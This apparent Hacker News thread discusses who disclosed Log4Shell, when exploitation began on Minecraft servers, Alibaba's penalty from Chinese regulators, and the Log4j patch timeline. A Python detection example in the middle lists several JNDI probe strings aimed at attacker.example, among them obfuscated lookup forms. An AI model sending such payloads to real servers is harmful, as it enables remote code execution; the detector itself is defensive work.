
> Alibaba group were the ones that disclosed the log4shell vulnerability which always surprised me

Really? My memory of the event was that the news broke in Minecraft servers [0] before it was expanded to all Java apps that used log4j.

[0]: https://arstechnica.com/information-technology/2021/12/the-l...



https://en.wikipedia.org/wiki/Log4Shell

> The vulnerability had existed unnoticed since 2013 and was privately disclosed to the Apache Software Foundation, of which Log4j is a project, by Chen Zhaojun of Alibaba Cloud's security team on 24 November 2021, before an official CVE identifier was made available on December 10th, 2021.

Your link dated 12/13/2021 says:

> Log4Shell is the name given to a critical zero-day vulnerability that surfaced on Thursday when it was exploited in the wild in remote-code compromises against Minecraft servers.

Which would have been around the 9th of Dec.


Yeah, and they failed to report to China's MIIT within the time window... https://www.wsj.com/articles/china-halts-alibaba-cybersecuri...

(To be clear, the obligation is not that they have to report to the Chinese government first. They just totally forgot to tell the government agency responsible for coordinating these kinds of security incidents across companies.)


TBF, at least half of the firms didn't give a fuck about the specific regulation at that time, and given the rumor that the bug was found when a Security Engineer (who works on product security instead of vulnerability research) decided to learn CodeQL, I'm not surprised nobody on his report chain cared enough.

... and oh, hi, are you the same fancl20 from <that mostly-defunct Chinese Twitter-clone> some 15 years ago?


Yes I'm... hmm, you can contact me by my id at gmail if you want :)


It started here https://github.com/apache/logging-log4j2/pull/608#issuecomme... and it was rapidly recognized that this impacted almost everything.

Minecraft servers were one of the most accessible places to use the exploit and, at the same time, some of the ones least likely to apply updates rapidly.


As others pointed out, that comment was after the CVE was created.


The comment is, but the start of the PR (by a person from the Apache Foundation org) matches the "we told Apache" date.

The "all hell broke loose" starts with that comment.

Note that the LDAP part wasn't sufficient to fully excise the security vulnerability.
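The remark above, that fixing only the LDAP path did not fully close the hole, has a direct analogue on the detection side: a log filter that matches only `${jndi:ldap://` misses the other JNDI schemes and the nested-lookup obfuscation that showed up in scanning traffic. The following is an added example, not code from the thread or from the Log4j project: a small normaliser for Log4j-style `${...}` lookups (handling only the `lower:`, `upper:` and `:-default` forms, an assumption that covers the common probe shapes, not every lookup Log4j supports) run over constructed log lines, comparing a naive LDAP-only regex against a scheme-agnostic one.

```python
import re

# Constructed sample access-log lines (not from the original thread) showing
# several shapes a JNDI probe string took: plain ldap, rmi, nested lower:
# lookups, the ${::-x} default-value trick, and one benign line.
SAMPLE_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "-" "${jndi:rmi://attacker.example/b}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/c}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example/d}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
]

# The "LDAP only" view: literal match on the single most-publicised probe form.
NAIVE_LDAP = re.compile(r"\$\{jndi:ldap://", re.IGNORECASE)

# Innermost ${...} with no nested ${ or } inside; resolved inside-out below.
INNER = re.compile(r"\$\{([^${}]*)\}")

# Any JNDI scheme after normalisation; group 1 is the scheme (ldap, rmi, dns, ...).
JNDI_ANY = re.compile(r"\$\{jndi:([a-z]+)://", re.IGNORECASE)


def _resolve(inner: str) -> str:
    """Resolve one lookup body. Simplified assumption: only the forms
    ${::-x}, ${name:-default}, ${lower:x} and ${upper:x} are modelled;
    anything else is left as-is so the caller's loop terminates."""
    if inner.startswith("::-"):          # ${::-j} -> "j"
        return inner[3:]
    if ":-" in inner:                    # ${env:NOPE:-j} -> "j"
        return inner.split(":-", 1)[1]
    name, sep, arg = inner.partition(":")
    if sep and name.lower() == "lower":
        return arg.lower()
    if sep and name.lower() == "upper":
        return arg.upper()
    return "${" + inner + "}"            # unknown lookup: leave untouched


def normalize(text: str, max_rounds: int = 10) -> str:
    """Repeatedly collapse innermost lookups so obfuscated strings end up
    in their canonical ${jndi:scheme://...} form. Bounded so a pathological
    input cannot spin forever."""
    for _ in range(max_rounds):
        new = INNER.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def scan(lines):
    """Return (line, scheme, caught_by_naive_filter) for each JNDI hit."""
    hits = []
    for line in lines:
        m = JNDI_ANY.search(normalize(line))
        if m:
            hits.append((line, m.group(1).lower(), bool(NAIVE_LDAP.search(line))))
    return hits


def naive_hit_count(lines) -> int:
    """How many lines the LDAP-only literal filter would have flagged."""
    return sum(1 for line in lines if NAIVE_LDAP.search(line))


if __name__ == "__main__":
    for line, scheme, naive in scan(SAMPLE_LINES):
        print(f"scheme={scheme:<4} naive_filter_caught={naive}  {line}")
    print("naive filter total:", naive_hit_count(SAMPLE_LINES), "of", len(scan(SAMPLE_LINES)))
```

On the constructed lines the literal LDAP filter flags one of the four probes, while the normalised, scheme-agnostic check flags all four; the same asymmetry is why a fix or a filter scoped to one protocol path is not a complete answer to a lookup feature that reaches the network.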


24th Nov reported by Alibaba, and on the 30th this conversation starts in response to the heads-up, right?


I believe the timeline is:

    Nov 24 - Wednesday - Report of issue
    Nov 25 - Thursday  - Thanksgiving
    Nov 29 - Monday    - Work done
    Nov 30 - Tuesday   - PR submitted
    (review as if nothing special)
    Dec  9 - Thursday  - "Is it a security vulnerability?"
    Dec 10 - Friday    - All hell breaks loose (Log4j 2.15.0 released)
    Dec 13 - Monday    - Java devs updating libraries furiously (Log4j 2.16.0 released)
    Dec 18 - Saturday  - Wait? there's more (Log4j 2.17.0 released)
    ...
    Dec 27 - Monday    - Enough already (Log4j 2.17.1 released)


It was the Alibaba group. They were even penalised by Chinese authorities for not following some protocol around disclosures.



